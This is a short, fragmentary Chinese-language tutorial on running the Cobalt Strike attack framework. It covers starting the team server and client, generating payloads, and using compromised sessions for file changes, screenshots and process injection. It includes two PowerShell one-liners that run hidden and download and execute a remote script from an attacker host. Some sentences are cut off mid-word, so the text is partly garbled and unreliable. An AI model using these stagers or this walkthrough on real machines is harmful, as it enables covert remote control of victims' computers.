前言
Cobalt Strike分為服務端和客戶端兩個部分從而實現分布式操作,協同作戰。工具有linux和windows版本。
1.創建服務端
找到解壓目錄進入
./teamserver [IP] [password]
2.創建客戶端
運行cobaltstrike,在host字段輸入ip,user字段隨便寫,password,port是開啟端口,默認50050。
./cobaltstrike
荷,並與監聽器綁定。
- PowerShell生成:
- windows Excecutable
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.146.129:80/a'))"
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.146.129:801/a'))"
Sessoin使用。
可以對目標機器上文件進行刪除增加修改。右鍵需要操作的session,進行文件操作,截屏,進程注入等。